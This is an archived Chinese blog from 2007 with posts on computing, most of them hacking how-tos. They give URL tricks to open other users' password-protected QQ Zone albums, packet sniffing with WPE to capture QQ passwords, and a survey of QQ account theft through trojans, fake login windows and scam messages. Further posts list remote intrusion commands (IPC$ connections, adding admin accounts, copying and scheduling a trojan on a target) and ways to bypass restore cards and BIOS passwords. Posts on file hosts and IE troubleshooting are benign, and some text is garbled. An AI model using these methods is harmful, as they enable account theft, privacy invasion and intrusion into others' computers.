您正在查看 "计算机" 分类下的文章
2007-04-23 04:23
QQ空间相册密码破解法
第一步-打开IE-工具-IE选项-删除文件F-删除COOKISS-打开设置-查看文件夹
第二步-打开相册-在刚才打开的文件夹里点击刷新,然后找到一个文件名为
cgi_qqzone.cgi的文件.打开他-看到一些代码...然后就按Ctrl+F
输入相册的名字<比如加密相册叫:这就是我....则打入"这就是我"
按两次 查找下一个...然后在下面一点看到一个http://开头和一串数字结尾的连接就是加密相册的图片拉,...复制到IE上就可以看到拉....
查看QQ空间
1,打开你所要进入的空间,有密码的空间哈。
点击属性:看到地址是:http://user22.q-zone.qq.com/client/need_passwd.htm?xxxxxx
2,复制到浏览器打开浏览,后面XXXXXX是QQ号吗。
3,再把XXXXXX号码换成你知道密码的QQ空间号码[你可以把自己的空间设置成有密码撒],浏览。
4,输入你自己知道的密码,进入后,就是你那个自己的换后的空间
5,打开后是:http://b.q-zone.qq.com/q?uin=XXXXXX[这个号吗是你自己的]
6,然后在把XXXXXX又换成你要进的有密码的空间,看看进的了不咯
7,收工
值得一提的是,这个方法到5月9号我测试时发现已经不能用了,但下面的可以
http://q-zone.qq.com/client/?uin=QQ号码&url=/cgi-bin/blog/cgi_blog_cont%3Fuin%3D82133202%
26diaryid%3D46668%26voteid%3D0%26getvn%3Dyes%26currentpage%3D1%26type%3D2%26hassign%3D2%
26effect%3D0
只要将上面网址中的QQ号码改为你要访问的空间的QQ号就行了,这样无论哪个空间都能进,不管有没有密码
一样OK~就算他的空间没有开通我们一样可以进去留言^_^
破解相册的代码
http://q-zone.qq.com/cgi-bin/photo/cgi_photo_bigview?albumid=相册ID&uin=QQ号码
将上面的QQ号码随便改为5-10位数的QQ号码),然后相册ID就改为那个加密码的相册的ID。相册ID的查找方
法如下:
右键点击那个加了密码的相册名称,然后点击属性找到相册的网址,这时你可以在网址中看到albumid=吧
,albumid=后面的数字就是相册的ID
所以如果你不想让别人看到你的相册最好就将其设置为“不公开“,否则你这样吊人胃口反让人胃口大开 |
2007-04-23 04:21
http://www.kusu.org/soft/13/22/
音频、视频上传空间
☆ STICKAM
http://www.stickam.com/
强烈推荐
功能:综合媒体空间,几乎全能:包括图片、音频、视频、本地摄像头自拍上传。
外链情况:可外链 支持在线列表式播放,所有人共享文件
空间大小:500M
上传文件大小限制:没有带宽制约
保存时间限制:永久
观看速度:快
上传速度:很快
语言:英文 虽然是英语,但很好用 略懂单词或有翻译工具的都可以很容易使用,这网站人气不错,有世界各国的注册会员
其他:需注册。外链、播放等方式基本和YouTube等差不多。
测试样本:http://www.stickam.com/profile/lkaoc
☆ YouTube
http://www.youtube.com/
功能:视频上传
外链情况:可外链
空间大小:无限制
上传文件大小限制:单个文件最大100M
保存时间限制:永久
观看速度:一般
上传速度:一般
语言:英文
其他:需注册。不会被人查到视频真实网址(因为是使用FLASH播放器,除非遇上熟手)。有生成外链插入网页代码。缺点是视频大小固定,容易使视频模糊。(具体介绍)
测试样本:http://www.youtube.com/watch?v=bcxbqmYTxqY
☆ Xuite WebHD
http://www.xuite.net/
功能:网站功能很多,其中一项“网络硬碟”可上传文件。各种文件都可。
外链情况:不能外链
空间大小:最大可手动调整到230M
上传文件大小限制:单个最大值50M
保存时间限制:永久
观看速度:无
上传速度:一般
语言:中文
其他:需注册。
http://www.filelodge.com/
功能:似乎是全能网站。音频视频图片皆可。
外链情况:支持外链
空间大小:500M
上传文件大小限制:小于500M
保存时间限制:永久
播放速度:不错
上传速度:一般
语言:英文
其他:音频视频有时候直接打开地址不一定能播放,但在Windows Meida Player等播放器里打开绝对能听,且速度不错,不需要缓冲很久。网站能生成上传文件在网页上的代码(比如在网页播放MP3为背景音乐的代码)
测试样本:http://www.filelodge.com/files/hdd8/189366/misia.mp3
该文件为一个5.9M的MP3文件。
☆ Castpost
http://www.castpost.com/
功能:音频、视频上传
外链情况:支持外链
空间大小:100M
上传文件大小限制:小于100M
保存时间限制:永久
观看速度:一般
上传速度:比YouTube快很多
语言:英文
其他:需注册。提供在线观看,易查到流媒网址。
样本测试:http://keleijin.castpost.com/97676.html
该文件为一个41.4M的文件。
● 国外空间
http://pic.comicme.net/index.htm
这个是中文的,比较好用。
http://picsplace.to
单个文件限制: 1500kB
上传类型:jpg,gif,jpeg,png,bmp,swf
http://www.freefilehosting.net
单个文件限制:3MB
上传类型:txt, jpg, gif, bmp, png, swf, arj, zip, ace, exe, txt, nfo, txt, doc, mp3, wav, xls, pdf
http://www.putfile.com
单个文件限制:图片 2MB 其他 10ΜB
上传类型:jpg .gif .png .wmv .avi .mpg .mov .asf .swf 94 k
http://www.hostpic.biz
单个文件限制:50KB
上传类型:jpg, gif, jpeg, png
http://www.imgzone.info
单个文件限制: 100kB
上传类型:jpg,gif,jpeg
http://www.picvault.info
单个文件限制: 1024kB
上传类型:jpg, gif, jpeg, png,bmp
http://uploadyourimages.com/index.php
单个文件限制: 500kB
上传类型:jpg, gif, jpeg, png
http://www.imagehosting.us
单个文件限制: 1024kB
上传类型:jpg,gif,jpeg,png,bmp
http://xs.to
单个文件限制: 1500kB
上传类型:jpg,gif,jpeg,png,bmp
http://www.imagevenue.com
单个文件限制: 1500kB
上传类型:jpeg, jpg
● 上传贴士
① 上传过程中不要按任何上传页面的按扭。否则功亏一篑。好吧,如果你一定要按,就用右键按“在新窗口中打开”。
② 使用网页方式上传的网站有的不显示上传的进度条。这时候你可以看IE的状态栏。有前进就表示在上传。当然,如果文件很大或网速很慢有可能很久很久那个东西才前进一点。
③ 切记上传文件务必用英文或数字命名,如果是中文名或符号命名文件可能导致下载错误。有的空间上传完后会直接以文件在你电脑上的名字命名,如果文件名中有空格可能会导致你文件按正确的地址也打不开。
④ 请珍惜网络资源。没有特殊必要就不要一个人在同一网站上注册N个账号。
⑤ 如果你想传些几M的小文件又觉得以上推荐的网站不够好,你可以去搜索网站搜一些比如“公共上传区”之类的东西。那些地方一般可以外链且如果碰上不勤或好心的斑竹基本文件不会被删。不过这事好象不太好又冒风险就是了。 V8
⑥ 如果有时打不开以上空间请不要放弃。都是久经考验的空间。过段时间再试试? |
2007-04-23 04:16
IE遇到问题常见原因及解决
解决方法:
这种原因比较多出现在需要手动指定IP、网关、DNS服务器联网方式下,及使用代理服务器上网的。仔细检查计算机的网络设置。
1、DNS服务器的问题
当IE无法浏览网页时,可先尝试用IP地址来访问,如果可以访问,那么应该是DNS的问题,造成DNS的问题可能是连网时获取DNS出错或DNS服务器本身问题,这时你可以手动指定DNS服务(地址可以是你当地ISP提供的DNS服务器地址,也可以用其它地方可正常使用DNS服务器地址。)在网络的属性里进行,(控制面板—网络和拔号连接—本地连接—右键属性—TCP/IP协议—属性—使用下面的DNS服务器地址)。不同的ISP有不同的DNS地址。有时候则是路由器或网卡的问题,无法与ISP的DNS服务连接,这种情况的话,可把路由器关一会再开,或者重新设置路由器。
还有一种可能,是本地DNS缓存出现了问题。为了提高网站访问速度,系统会自动将已经访问过并获取IP地址的网站存入本地的DNS缓存里,一旦再对这个网站进行访问,则不再通过DNS服务器而直接从本地DNS缓存取出该网站的IP地址进行访问。所以,如果本地DNS缓存出现了问题,会导致网站无法访问。可以在“运行”中执行ipconfig /flushdns来重建本地DNS缓存。
2、IE浏览器本身的问题
当IE浏览器本身出现故障时,自然会影响到浏览了;或者IE被恶意修改破坏也会导致无法浏览网页。这时可以尝试用“黄山IE修复专家”来修复(建议到安全模式下修复),或者重新IE(如重装IE遇到无法重新的问题,可参考:附一解决无法重装IE) http://k260.net
3、网络防火墙的问题
如果网络防火墙设置不当,如安全等级过高、不小心把IE放进了阻止访问列表、错误的防火墙策略等,可尝试检查策略、降低防火墙安全等级或直接关掉试试是否恢复正常。
4、网络协议和网卡驱动的问题
IE无法浏览,有可能是网络协议(特别是TCP/IP协议)或网卡驱动损坏导致,可尝试重新网卡驱动和网络协议。
5、HOSTS文件的问题
HOSTS文件被修改,也会导致浏览的不正常,解决方法当然是清空HOSTS文件里的内容。
6、系统文件的问题
当与IE有关的系统文件被更换或损坏时,会影响到IE正常的使用,这时可使用SFC命令修复一下,Win 98系统可在“运行”中执行SFC,然后执行扫描;Win 2000/XP/2003则在“运行”中执行sfc /scannow尝试修复。
其中当只有IE无法浏览网页,而QQ可以上时,则往往由于Winsock.dll、wsock32.dll或wsock.vxd(VXD只在Win 9X系统下存在)等文件损坏或丢失造成,Winsock是构成TCP/IP协议的重要组成部分,一般要重装TCP/IP协议。但xp开始集成TCP/IP协议,所以不能像98那样简单卸载后重装,可以使用 netsh 命令重置 TCP/IP协议,使其恢复到初次安装操作系统时的状态。具体操作如下:
点击“开始 运行”,在运行对话框中输入“CMD”命令,弹出命令提示符窗口,接着输入“netsh int ip reset c:\resetlog.txt”命令后会回车即可,其中“resetlog.txt”文件是用来记录命令执行结果的日志文件,该参数选项必须指定,这里指定的日志文件的完整路径是“c:\resetlog.txt”。执行此命令后的结果与删除并重新安装 TCP/IP 协议的效果相同。
小提示:netsh命令是一个基于命令行的脚本编写工具,你可以使用此命令配置和监视Windows 系统,此外它还提供了交互式网络外壳程序接口,netsh命令的使用格式请参看帮助文件(在令提示符窗口中输入“netsh/?”即可)。
第二个解决方法是修复以上文件,Win 9X使用SFC重新提取以上文件,Win 2000/XP/2003使用sfc /scannow命令修复文件,当用sfc /scannow无法修复时,可试试网上发布的专门针对这个问题的修复工具WinSockFix,可以在网上搜索下载。
7、杀毒软件的实时监控问题
这倒不是经常见,但有时的确跟实时监控有关,因为现在杀毒软件的实时监控都添加了对网页内容的监控。举一个实例:KV2005就会在个别的机子上会导致IE无法浏览网页(不少朋友遇到过),其具体表现是只要打开网页监控,一开机上网大约20来分钟后,IE就会无法浏览网页了,这时如果把KV2005的网页监控关掉,就一切恢复正常;经过彻底地重装KV2005也无法解决。虽然并不是安装KV2005的每台机子都会出现这种问题,毕竟每台机子的系统有差异,安装的程序也不一样。但如果出现IE无法浏览网页时,也要注意检查一下杀毒软件。
8、Application Management服务的问题
出现只能上QQ不能开网页的情况,重新启动后就好了。不过就算重新启动,开7到8个网页后又不能开网页了,只能上QQ。有时电信往往会让你禁用Application Management服务,就能解决了。具体原因不明。
9、感染了病毒所致
这种情况往往表现在打开IE时,在IE界面的左下框里提示:正在打开网页,但老半天没响应。在任务管理器里查看进程,(进入方法,把鼠标放在任务栏上,按右键—任务管理器—进程)看看CPU的占用率如何,如果是100%,可以肯定,是感染了病毒,这时你想运行其他程序简直就是受罪。这就要查查是哪个进程贪婪地占用了CPU资源.找到后,最好把名称记录下来,然后点击结束,如果不能结束,则要启动到安全模式下把该东东删除,还要进入注册表里,(方法:开始—运行,输入regedit)在注册表对话框里,点编辑—查找,输入那个程序名,找到后,点鼠标右键删除,然后再进行几次的搜索,往往能彻底删除干净。有很多的病毒,杀毒软件无能为力时,唯一的方法就是手动删除。
http://www.hackvip.com/黑软基地 |
2007-04-23 04:09
这个方法什么号都可以盗,只要是号!!!!!
首先,我们要用到wpe 你别说你不知道是什么,这是一个拦截个修改封包数据的工具,很好用哦
好我们先演示一下WPE的使用,便于初次使用的朋友学习
先启动这个IE,然后进入WPE选择 IEXPLORE。EXE这个程序
就是白色字那个了,我们选定它,作为我们研究的对象!然后是发送封包接收封包的问题了,为了从最简单的入手,我们先把网线拔了,什么?不明白网线是什么?那我无法说明了,你别问我,问旁边的人吧,一定有人知道的,反正就是你上网那根线,先把它拔下来,这样就没有封包返回,方便研究!下面看看,我们从最简单的入手,首先我们发送一个地址,就在IE中输入地址,然后按回车,这里我们输入的地址是:>http://fengyes.con.cn/[/url]结果看到了吧,右边有封包的分析,对于简单的未加密的封包,WPE可以自动分析,下面我们输入地址:>http://fengyes.con.cn/[/url] 结果又看到了哦
这是第一步如果你顺利完成,看下一步,分析封包了哦,注意~
我们比较一下两个封包,可以发现,相同的部分很多,按我们的分析应该差别只应该在“ee”与"ff"的区别,因为发送的内容只有这点差别,但是上面的封包显示出来的却不是这样,为什么?
其实,他们确实是一样的,在IE的封包里面,01、02、03、04都代表点的意思,也就是代表:"."这个意思,那么你再分析就发现完全和我们预料的一样了,这里是IE发送的封包,没有加密的,您可以直接读出来的!但是这不是10进制,而是16进制,因此,我们必须把它翻译成为10进制,以方便我们阅读,怎么办?
别忘了,我在WPE下载页给出了一个Asic II工具,现在就用吧,
好,我们来翻译这个封包,前面的不管,我们只关心封包里面的数据:打开Asic II工具,输入"W",点查看,看到了什么?------“77”(十六进制),看到了吧,我们输入的有3个“W”,这里是不是有3个77啊?前面已经讲过,02代表点号,那么,接下来是不是也是我们预料的是“f”呢?我们继续用工具查一下看看,果然不出我们分析所料,真是f,不用多猜了,接下来的内容就是".com"怎么样?是不是很简单呢?
还不懂?**,那我还讲一次吧
在Internet Exproler中输入>http://fengyes.con.cn/[/url],然后按回车
在WPE中点拦截
点三角形
收到封包后点红色的正方形,封包就出现了
们来分析一下上面的内容!
首先几点说明,这是对Internet Exproler进行的封包操作,请求的地址暂时不说,您可以分析出来的!下面是分析说明!
首先,本地发送请求到服务器!发送内容是“21”,注意:您一定很容易地认为发送的是“21”,其实,数字也好,字母也好,一定要注意,全都是16进制的,所以,这个“21”不是我们平常的21,而是16进制的21,那我们来算一下21等于多少(计算21转换为10进制等于多少)?21(16位)=2 x 16 + 1 = 33 (10进制),关于进制计算,我们专门的章节有说明的
再查ASCII表,看看33对应的是什么字符?查到了吗?是“!”,呵呵,WPE不是已经在右边给我们显示了吗?不过我们要习惯分析哦,到游戏里面可就没那么多的方便了!
那么发送一个!是什么意思呢?其实这个是网络连接的问题了,不必细究,要详细了解的请查看关于网络连接3次握手的相关内容!这里不做讲解!这个与游戏修改无关!
第3行47是什么意思呢?算一下:47(16)=4 x 16 + 7 = 71(10)括号内16代表16进制,10代表10进制,那么71代表什么?查表ASCII结果:71对应字母“G”
45呢?45(16)=4 X 16 +5 =69(10),查表出来的结果是:E
请你不要看右边的分析,我知道右边有现成的结果,但是你要自己分析,不然你拿着游戏就无从下手了!简单的分析就是这样了,是不是很轻松?好,再继续分析几个!
第15行,的3A什么意思?
3A(16)=3 X 16 + 10 = 58(10)
查表得,58对应“ :”
倒数第2行B7什么意思?
B7(16)=11 X 16 + 7 =183(10)
查表得到183对应:特殊字符,这里我无法帮你打出这个字符,抱歉!
注意,这里WPE也翻译不出来对应的字符了,看到了吗?WPE只翻译了最后两个,如果我们自己需要怎么办?当然是自己分析了,所以说不要看WPE帮你的分析,自己分析很重要
同样,盗QQ也简单嘛~~拦截他对服务器所发送的登陆封包数据,看看,分析一下,密码来了,脱离木马的感觉爽吗,哈哈~
还有进制数转换可以用WINDOWS自带的计算器,有这个功能,方便吧?会了吗,嘿嘿 |
2007-04-23 04:07
2007-04-23 04:05
远程破解盗窃QQ密码的内幕
“远程破解”与“本地破解”正好相反,是指QQ盗号者通过网络盗窃远端QQ用户的密码。这种QQ破解有很多方法,如在线密码破解、登录窗口破解、邮箱破解、消息诈骗以及形形色色的QQ木马病毒等。下面就让我们一同来看看这些QQ密码的远程破解是怎么实现的。
1、在线密码破解
大家知道QQ可以利用代理服务器登录,这是一种保护措施。它不仅可以隐藏用户的真实IP地址,以避免遭受网络攻击,还可以加快登录速度,保证登录的稳定性。
在线密码破解和本地密码破解采用的技术方法类似,都是穷举法,只不过前者完全脱离了本地用户使用的QQ。它通过对登录代理服务器进行扫描,只要想盗的QQ号码在线,就可利用在线盗号工具实现远程TCP/IP的追捕,从而神不知鬼不觉地盗取QQ密码!
在线破解改变了本地破解那种被动的破解方式,只要是在线的QQ号码都可以破解,适用范围较广。但是由于它仍然采用穷举法技术,所以在枚举密钥位数长度以及类型时,校验时间很长,破解效率不高。同样,这种方法还受到电脑速度、网速等诸多因素的影响,因此比前面的本地破解更麻烦。
目前功能比较强大的一款QQ密码在线破解软件叫QQExplorer。它的破解操作分四步:第一步,在QQ起始号码和结束号码中填上想要盗取的QQ号码(此号码必须在线);第二步,在“添加或删除HTTP代理服务器”中输入代理服务器的IP地址和端口号码(如果你嫌自己寻找QQ代理服务器麻烦,可以使用一些现代的QQ代理公布软件);第三步,点击“添加&测试”按钮,软件先自动检测此服务器是否正常,确定后将它加入代理服务器列表(此软件可填入多个代理服务器的地址,并且能够自动筛选不可用或者速度慢的服务器);第四步,点击“开始”按钮,开始在线密码破解……
图12、登录窗口破解
伪造QQ登录窗口的盗号方法非常简单,这是一种比较另类的木马破解方法(后面对木马破解有专门讲述)。先用盗号软件生成一个伪装的QQ主程序,它运行后会出现跟腾讯QQ一模一样的登录窗口,只要用户在这个伪登录窗口中登录,输入的QQ号及密码就会被记录下来,并通过电子邮件发送到盗号者指定的油箱中,在此以一款叫“狐Q”的软件为例,首次运行它时,它会把自身复制到QQ目录中,并把原来的QQ.exe文件改名为QQ.com(这样的更改不会影响QQ的正常运行)。设置完毕后,“狐Q”的原程序就会消失,伪装成QQ等待“猎物”上钩……在其软件设置中,有一项设置可以决定真假QQ交替运行的次数,可以减少用户在使用QQ时产生的怀疑。比如说将“生效次数”设定为3,那么用户第一次运行的是真QQ了,也就是说在第三次运行时,用户的QQ号便被盗了!在QQ密码发送的过程中,如果发送失败,它还会把QQ号和密码记下来,等待下一次发送。
即时监视QQ登录窗口的盗号方法利用Windows窗口函数、句柄功能实现QQ号和密码的后台截取。此类软件几乎可以捕获Windows下所有标准密码框中的密码,如QQ、Outlook、屏幕保护程序、各种电子邮件客户端、各种游戏账号和上网账号等。捕获后,它也会将密码实时发送到盗号者指定的邮箱中。其代表性的盗号软件是“密码使者”,它几乎可以捕获Windows 9x/2000/XP下所有登录窗口中的密码,并且还能够盗取在网页中登录的各种密码。盗号在使用这款软件时,只须填上用于接收别人QQ密码的邮箱地址及保护密码,并把生成的盗号器文件传过去哄骗别人运行,然后就可以坐等密码上门!此软件与传统的键盘记录器不同,它在电脑每次开机时隐藏自启动,不管密码是用键盘输入的,还是复制、粘贴的,都能够有效地实时拦截!其注册版本居然还带有自动升级的功能,破坏力十分巨大。
图2
“密码使者”几乎可以捕获系统所有登录窗口中的密码
3、邮箱破解
利用邮箱盗取QQ密码也是一种比较常用的方法。我们都知道,腾讯公司在对用户的QQ号码进行验证时需要用户填写电子邮箱。对于申请了“密码保护”功能的用户,在腾讯主页上找回遗忘的密码时,密码会被发送到用户注册时的邮箱中。所以,只要盗号者破解了对方的电子邮箱,就有机会得到其QQ密码!通常我们在对方QQ注册时填写的邮箱。至于如何破解电子邮箱,具体的操作方法有多种,由于它有点超出文本的范畴,所以大家可以自己上网查询相关资料,在此就不赘述了。
4、消息诈骗
孔子曰:上士杀人用笔端,中士杀人用语言,下士杀人用石盘。远程盗取QQ密码还有一种大家最常见也是最简单最有效的方法,那就是利用不少人爱贪小便宜的弱点,进行人为的欺骗!
标题:腾讯关于xxxxx获奖通知
“QQ幸运儿:恭喜!!!您已经成为QQ在线网友齐抽奖的中奖用户。您将获赠精美T恤1件,并有机会得到NOKIA 7110手机1部。腾讯公司(tencent.com)注:奖品是以邮寄方式寄出,请您认真填写以下资料。如果填写错误,将被作为自动放弃获奖机会处理。>比如我们的QQ经常会收到如下的陌生人消息。
如果你真的如实填写这些资料并傻傻的发送回去,不一会儿QQ密码就被盗了。
还有类似这样的消息:“亲爱的***号QQ用户,恭喜你你已经成为腾讯的幸运号码,腾讯公司送你QQ靓号:12345,密码:54321。请尽快登陆并修改密码,感谢您对腾讯公司的支持!”不少人一看,以为白捡的便宜来了 ,登录一试还是真的,于是就大大咧咧地笑纳了。但是,很多人为了方便,不管什么东西都爱使用相同的密码,所以当这个QQ号的密码被你改为与自己QQ号相同的密码时,自己QQ号的连同这个赠送的QQ号都得玩完!这是因为,赠送的QQ号已被盗号者申请过密码保护,当你更改密码后他就利用腾讯的密码保护功能把它收了回去,同时也收走你的QQ密码。如果你的QQ没有申请过密码保护,此刻就只能和它永别了。
5、更多的木马破解
“古希腊大军围攻特洛伊城,久攻不破,遂造一大木马藏匿将士于其中,大部队假装撤退而弃木马。城中得知敌退,将木马作战利品拖入城内。午夜时分,匿于木马中的将士开启城门四处纵火,城外伏兵涌入,里应外合,焚屠特洛伊城。”这是古希腊神话《木马屠城记》的故事,其中那只木马被黑客程序借用其名,表“一经潜入,后患无穷”之意。一个完整的木马程序由服务器端和控制端组成。所谓“中了木马”,是指用户的电脑中被安装了木马的服务器端,而拥有控制端的盗号者就通过网络远程控制该电脑,从而轻而易举地盗得该缒灾械腝Q密码。
针对QQ的木马程序多不胜数,其中专门盗取QQ密码的也有一大堆,它们被偷偷地安装在用户的电脑中,随电脑启动而自动运行,如果用户使用QQ,那么其账号和密码就会被这些木马记录下来,并发送到木马安装者的邮箱中。前面已经介绍了两款通过登录窗口盗号的QQ木马,下面再介绍两款典型的。
第一款:极品QQ盗号2004
这是“极品QQ盗号”木马的最新版本。它的使用方法跟前面介绍的“密码使者”差不多,先再“设置”栏中填入接收QQ密码的邮箱地址和发送邮件的标题,然后把生成的盗号器偷偷地安装到别人的电脑里……这个木马声称可以避过主流的杀毒软件,盗取QQ最新版本的密码,即QQ2004和QQ2004奥运特别版的密码。
图3 “极品QQ盗号2004”声称可以盗取QQ2004
第二款:QQ间谍3.0
使用此木马软件时,点击工具条上的“服务端”,按照提示生成服务端程序,然后把它偷偷地传到别人的电脑中,当受害者不小心运行了它,木马就被种上了。这个木马不仅可以盗号,还能悄悄地在后台记录受害者的QQ聊天信息,并下载可执行文件实现远程升级和远程执行脚本程序。另外再注册之后,它还可以直接远程监控对方电脑上的QQ聊天记录。
利用木马软件盗取QQ密码,显然比用前面介绍的那些破解方法更有效率!不仅节省时间,而且成功率也高。但是,如何把木马程序的服务器端安装在用户的电脑中,这是一个费心思的事儿。另外,很多功能强大的木马程序都是需要花钱注册,才能使用其全部功能。因此,对于那些水平参差不齐的盗号者而言,要想玩转木马程序,还得费点劲。
> QQ号码:> 密码:> 姓名:> E-mail地址:> 身份证号码:> 通讯地址:> 联系电话:> 邮编:”
|
2007-04-23 03:57
DOS命令下的入侵命令大全
DOS 切换到MS-DOS提示符
DIR/LS/LIST 目录/文件列表
CD 进入目录
MD/MKDIR 创建目录
PWD 查看当前目录
COPY/CP 复制目录/文件
DEL/RM 删除目录/文件
REN 重命名文件
MOVE/MV 移动目录/文件
TYPE/CAT 查看文本内容
POPMSG 弹出系统对话框
SYSINFO 查看系统基本信息
WHO/W 查看当前所有链接者IP
SHELL 通过系统SHELL执行CMD命令
EXEC/RUN 通过WINDOWS API 运行程序
WS 查看窗口列表
PS 查看进程列表
KILL 强行关闭进程
GET/GETFILE 通过WOLLF直接下载文件
PUT/PUTFILE 通过WOLLF直接上传文件
WGET 从HTTP服务器下载文件
FGET 从FTP服务器下载文件
FPUT 向FTP服务器上传文件
TELNET 连接到其它安装本服务的机器
FTPD 启动FTP服务
TELNETD/TELD/EXPOPT 在新端口上输入SHELL
REDIR 绑定TCP端口,并转发接收到的所有数据
REDIR_STOP 停止端口转发
SNIFF 鉴听局域网内FTP/SMTP/POP3/HTTP 密码《该功能只对XP和2000有限》
SNIFF_STOP 停止鉴听密码
KEYLOG 启动键盘记录
KEYLOG_STOP 停止键盘记录
REBOOT 重启系统
SHUTDOWN 关闭系统
EXIT 断开当前链接
QUIT 断开所有链接并停止服务
REMOVE 卸载服务
VER\VERSION 版本信息
HELP/H/? 帮助信息
建立IPC$共享的命令 net use \\目标IP\ipc$ "账号密码" /user:账号
添加管理员账号命令 net user 用户名 密码 /add 添加到管理员组 再次运行命令 net localgroup administrators 用户名 /add
返回远程主机当前时间 net time \\远程主机IP
在远程主机1:00启动muma.exe这个服务 at \\远程主机IP 1:00 muma.exe
远程拷贝命令:1.把本地C盘下的muma.exe复制到目标IP的C盘下命令格式为:copy muma.exe \\目标IP\c$\muma.exe
2.把本地C盘下的muma.exe复制到目标IP的WINNT目录里面命令为:copy muma.exe \\目标IP\admin$muma.exe
启动TELNET服务命令为:net start telnet
关闭TELNET服务命令为:net stop telnet
查看计算机上账号列表:net user
把GUEST用户激活:net user guest /active:yse
把GUEST的密码改为123: net userguest 123
关闭对方的NT服务器命令: shutdown \\目标IP time 注:time是重启时间
查看对方机器系统类型:type c:\boot.ini
查看对方机器IP:ipconfig /all
与对方建立共享并映射驱动驱到本地Z盘:net use z: \\192.168.0.1\c$ "7788" /user:"administrator"
|
2007-04-23 03:49
还原卡及还原精灵的破解还原卡及还原精灵的破解 学生:今天上机我发现了一个重大
问题:在网吧的计算机上保存不住任何文件!发现这个情况也是偶然的:明明在计算机
上安装了很多软件,突然间死机了,重启之后刚才安装的软件一个也找不到了,系统就
象被网管重新安装了一遍那么干净。我决心找出其中的原因,不然的话,我每次上机都
要为自己安装一些习惯使用的软件如Netants(网络蚂蚁),这也太烦人了吧。哈哈,
还真叫我发现其中的奥妙,因为计算机操作系统容易受错误操作、非法关机、病毒入
侵、恶意破坏等问题的影响,所以网管在每台计算机上安装了叫做硬盘还原卡(也叫做
数据保护卡)的硬件设备,其界面为 如图1-13-1 。硬盘还原卡被制作成可以插入计算
机扩展插槽的外置插卡形状 如图1-13-2 ,下面的这一种是三合一的卡(网卡+保护卡+
数据克隆)如图1-13-3 ,只要将此卡插入计算机,并指定其保护的磁盘区域,以后即
使用户任意重新分区,格式化、修改配置、删除文件、感染病毒等等,只要重新启动计
算机,一切就象什么也没有发生过,硬盘自动恢复成了系统的初始状态。正因为还原卡
有如此神奇功效,网吧、学校机房等场所都纷纷安装了此类还原卡,认为从此天下太平
了。其实可害“哭”了象我们这样的网吧上网族,比如正在运行着程序突然当机了,没
办法,RESET重启吧,原先辛辛苦苦下载的数据一下子就没了。损失惨重、教训惨痛啊
!并且在还原卡的保护下,我们想修改计算机的配置信息都改不了。那还提什么系统入
侵呀,破解还原卡的工作是势在必行了。不知道大家注意过没有,网吧的计算机因为经
常坏需要维修,所以机箱盖板的螺丝基本是不上的,壳子就松松垮垮的套在机箱上。因
为还原卡是块插卡,又没有螺丝上着,赤手空拳的就可以对付它了。我就瞅机会把还原
卡拽下来了。如图1-13-4 瞧这只黑手,在高速的拔卡过程中被看到了,哈哈!注意:
千万不要在机器通电的时候这么干,要不然主板冒烟可不是闹着玩的。哈哈,卡子移出
了看你还能有什么本事!这样做有些品牌的还原卡会在引导的时候提示“移出还原卡”
,回车确定以后还原卡功能就被彻底从系统中清除了。还有些还原卡被拔下来后,根本
没有什么提示,还原功能就失效了。这样等我们安装完了软件、修改够了系统再把它插
上,呵呵,还原功能就又回来了,当然了计算机在没装还原卡时你所有的操作都会保留
下来的。 网管:千万不能为了自己维修方便而不上机箱的螺丝,我的网吧机箱螺丝上
地紧紧的都被有些来上网的家伙拔掉几块CPU、内存和还原卡了。后来没办法,只好做
个箱子把机箱锁起来。 学生:最近,网吧机箱不光上了螺丝,而且还贴了封条,加了
锁,装了箱。我的“物理”破解法只有告一段落了。其实很多种类的还原卡,跟BIOS设
置存在某种关联,如果在BIOS设置界面的 “BIOS Features Setup”中存在“Boot
From LAN First”项目,就要求将其设置为“Enable”(将引导顺序设为网络最优先)
,如图1-13-5 假设我们将这个选项设置为“Disable”,那么这块还原卡将不再工作。
这是真的,我就在几个网吧不同牌子的还原卡上测试成功过。如果还原卡的版本比较老
,更是绝对没有问题的。那么这里禁止还原卡就等同于破解BIOS密码了。 破解BIOS密
码我们可以使用操作系统自带的DEBUG程序来清除密码。因为BIOS设置程序存在厂商、
版本的不同,所以就有如下表所示的多种破解方法: 方法一方法二方法三方法四方法
五 -O 70 11-O 70 23-O 70 10-O 70 10-O 70 16 -O 71 FF-O 71 34-O 71 FF-O 71
00-O 71 16 -Q-Q-Q-Q-Q 看一下具体的破解步骤吧:在DOS下输入“DEBUG”并回车,
DOS提示符显示为“--”表示现在进入了DEBUG状态,然后依次输入“O 70 10”回车,
“O 71 FF”回车,最后输入“Q”并再次回车。如图1-13-6 重启计算机以后,BIOS提
示出错,按BIOS的热键(一般是“DEL”按键,注意屏幕上一般有提示)进入BIOS设置界
面的时候并不要求我们输入密码,说明我们已经破解成功了。上述方法的含义就是向
BIOS中写入代码,迫使BIOS自身校验出错,这样再重启计算机时,会要求进入BIOS重新
配置参数,而此过程是不需要密码的。 网管:看来删除DEBUG程序是势在必行了。 学
生:如果DEBUG程序被删除怎么办呢?我们先想办法进入DOS环境(双击运行“
c:\command.com”文件就可以进入DOS状态)。在DOS状态下,没有DEBUG程序不要紧,
还可以自己现场制作个破解BIOS的.com文件,实现对BIOS密码的清除工作。这听起来是
不是很神奇呢? 在DOS环境下输入:“COPY CON CMOS.COM”(引号不输入,以下同)
后回车,如图1-13-7 系统会自动另起一行,我们继续输入以下内容:“ALT+176
ALT+17 ALT+230 p ALT+176 ALT+20 ALT+230 q ALT+205 <空格>”,然后按键盘上的“
F6”键,再按回车键保存。如图1-13-8 【注意:输入以上数据时候先按键盘的ALT按键
,再按下数字小键盘区的数字按键,这里不能使用主键盘区的数字按键,输完一段数字
松开ALT按键,然后再按下ALT按键输入下一段】最后运行得到的cmos.com文件 如图
1-13-9 ,重新启动计算机BIOS提示出错,就可以不需要密码进入BIOS设置界面啦。 不
过有些还原卡在BIOS修改以后,会提示“发现CMOS有修改,是否存储CMOS资料?”这样
的信息,如图1-13-10 那么这块还原卡就不能通过这种方式进行破解了。 看了一些还
原卡说明书,也找了一些还原卡资料,我还知道了还原卡一般是有初始化的管理员口令
的,部分还原卡的默认密码如下:小哨兵:manager,远志:12345678,三茗:
12345678。如果网管没有另外设定密码的话,我们就可以输入这些默认密码来控制还原
卡了。如图1-13-11 其实很多还原卡还有我们所不知道的超级管理员密码或者是管理员
密码清除程序。这个密码或者程序从生产还原卡的公司宣传材料或者网站上是找不到
的。你要是对某款还原卡发生了兴趣,不妨冒充还原卡的最终用户向此还原卡代理商索
